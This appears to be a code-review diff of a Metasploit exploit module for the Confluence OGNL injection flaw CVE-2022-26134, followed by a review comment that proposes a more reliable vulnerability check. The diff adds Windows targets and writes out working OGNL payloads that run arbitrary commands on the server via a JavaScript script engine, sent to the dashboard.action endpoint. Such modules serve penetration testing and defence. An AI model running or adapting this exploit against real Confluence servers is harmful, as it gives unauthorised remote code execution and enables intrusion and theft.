@@ -27,15 +27,15 @@ def initialize(info = {})
2727 'Spencer McIntyre'
2828 ] ,
2929 'References' => [
30- [ 'CVE' , '2021-26084 ' ] ,
30+ [ 'CVE' , '2022-26134 ' ] ,
3131 [ 'URL' , 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro' ] ,
3232 [ 'URL' , 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py' ] ,
3333 [ 'URL' , 'https://github.com/jbaines-r7/through_the_wire' ] ,
3434 [ 'URL' , 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis' ]
3535 ] ,
3636 'DisclosureDate' => '2022-06-02' ,
3737 'License' => MSF_LICENSE ,
38- 'Platform' => [ 'unix' , 'linux' ] ,
38+ 'Platform' => [ 'unix' , 'linux' , 'win' ] ,
3939 'Arch' => [ ARCH_CMD , ARCH_X86 , ARCH_X64 ] ,
4040 'Privileged' => false ,
4141 'Targets' => [
@@ -54,6 +54,22 @@ def initialize(info = {})
5454 'Arch' => [ ARCH_X86 , ARCH_X64 ] ,
5555 'Type' => :dropper
5656 }
57+ ] ,
58+ [
59+ 'Windows Command' ,
60+ {
61+ 'Platform' => 'win' ,
62+ 'Arch' => ARCH_CMD ,
63+ 'Type' => :cmd
64+ }
65+ ] ,
66+ [
67+ 'Windows Dropper' ,
68+ {
69+ 'Platform' => 'win' ,
70+ 'Arch' => [ ARCH_X86 , ARCH_X64 ] ,
71+ 'Type' => :dropper
72+ }
5773 ]
5874 ] ,
5975 'DefaultTarget' => 0 ,
@@ -79,14 +95,29 @@ def check
7995
8096 vprint_status ( "Detected Confluence version: #{ version } " )
8197 header = "X-#{ Rex ::Text . rand_text_alphanumeric ( 10 ..15 ) } "
82- res = inject_ognl ( '' , header : header ) # empty command works for testing, the header will be set
98+ ognl = <<~OGNL . gsub ( /^\s +/ , '' ) . tr ( "\n " , '' )
99+ ${
100+ Class.forName("com.opensymphony.webwork.ServletActionContext")
101+ .getMethod("getResponse",null)
102+ .invoke(null,null)
103+ .setHeader(
104+ "#{ header } ",
105+ Class.forName("javax.script.ScriptEngineManager")
106+ .newInstance()
107+ .getEngineByName("js")
108+ .eval("java.lang.System.getProperty('os.name')")
109+ )
110+ }
111+ OGNL
112+ res = inject_ognl ( ognl )
83113
84114 return CheckCode ::Unknown unless res
85115
86116 unless res && res . headers . include? ( header )
87117 return CheckCode ::Safe ( 'Failed to test OGNL injection.' )
88118 end
89119
120+ vprint_status ( "Detected target platform: #{ res . headers [ header ] } " )
90121 CheckCode ::Vulnerable ( 'Successfully tested OGNL injection.' )
91122 end
92123
@@ -119,26 +150,7 @@ def exploit
119150
120151 def execute_command ( cmd , _opts = { } )
121152 header = "X-#{ Rex ::Text . rand_text_alphanumeric ( 10 ..15 ) } "
122- res = inject_ognl ( cmd , header : header )
123-
124- unless res && res . headers . include? ( header )
125- fail_with ( Failure ::PayloadFailed , "Failed to execute command: #{ cmd } " )
126- end
127-
128- vprint_good ( "Successfully executed command: #{ cmd } " )
129- res . headers [ header ]
130- end
131-
132- def inject_ognl ( cmd , header :)
133- send_request_cgi (
134- 'method' => 'POST' ,
135- 'uri' => normalize_uri ( target_uri . path , Rex ::Text . uri_encode ( ognl_payload ( cmd , header : header ) ) , 'dashboard.action' ) ,
136- 'headers' => { header => cmd }
137- )
138- end
139-
140- def ognl_payload ( _cmd , header :)
141- <<~OGNL . gsub ( /^\s +/ , '' ) . tr ( "\n " , '' )
153+ ognl = <<~OGNL . gsub ( /^\s +/ , '' ) . tr ( "\n " , '' )
142154 ${
143155 Class.forName("com.opensymphony.webwork.ServletActionContext")
144156 .getMethod("getResponse",null)
@@ -154,5 +166,20 @@ def ognl_payload(_cmd, header:)
154166 )
155167 }
156168 OGNL
169+ res = inject_ognl ( ognl , 'headers' => { header => cmd } )
170+
171+ unless res && res . headers . include? ( header )
172+ fail_with ( Failure ::PayloadFailed , "Failed to execute command: #{ cmd } " )
173+ end
174+
175+ vprint_good ( "Successfully executed command: #{ cmd } " )
176+ res . headers [ header ]
177+ end
178+
179+ def inject_ognl ( ognl , opts = { } )
180+ send_request_cgi ( {
181+ 'method' => 'POST' ,
182+ 'uri' => normalize_uri ( target_uri . path , Rex ::Text . uri_encode ( ognl ) , 'dashboard.action' )
183+ } . merge ( opts ) )
157184 end
158185end
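Review bot: The rewritten check (new lines 98-112) ties the OGNL-injection test to the availability of a JavaScript ScriptEngine: if `getEngineByName("js")` returns null (a JRE with no bundled Nashorn, presumably JDK 15+ or a trimmed runtime), the `.eval` on null fails, the header is never set, and line 117 returns `Safe` for a host whose injection point is actually reachable. I would prove evaluation first with a constant marker that needs no script engine, then run the `os.name` lookup as a best-effort second probe whose failure only costs the platform hint, and compare `res.headers[header] == marker` rather than `include?` for a stricter signal. The `res &&` on new line 116 is redundant after the `return CheckCode::Unknown unless res` on line 114 and can be dropped. `check` begins before the hunk, so the version detection above the header line is not shown here.

```ruby
  # … unchanged: version detection …
  header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
  marker = Rex::Text.rand_text_alphanumeric(8..12)
  # Probe 1: prove OGNL evaluation without depending on a script engine.
  probe = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
    ${
      Class.forName("com.opensymphony.webwork.ServletActionContext")
      .getMethod("getResponse",null)
      .invoke(null,null)
      .setHeader("#{header}", "#{marker}")
    }
  OGNL
  res = inject_ognl(probe)
  return CheckCode::Unknown unless res
  return CheckCode::Safe('Failed to test OGNL injection.') unless res.headers[header] == marker

  # Probe 2 (best effort): read os.name via the JS engine; a missing engine must not hide a vulnerable host.
  ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
    # … unchanged: the existing os.name OGNL expression …
  OGNL
  res = inject_ognl(ognl)
  if res && res.headers.include?(header)
    vprint_status("Detected target platform: #{res.headers[header]}")
  else
    vprint_warning('OGNL injection confirmed, but the JS engine probe failed; target platform unknown.')
  end
  CheckCode::Vulnerable('Successfully tested OGNL injection.')
```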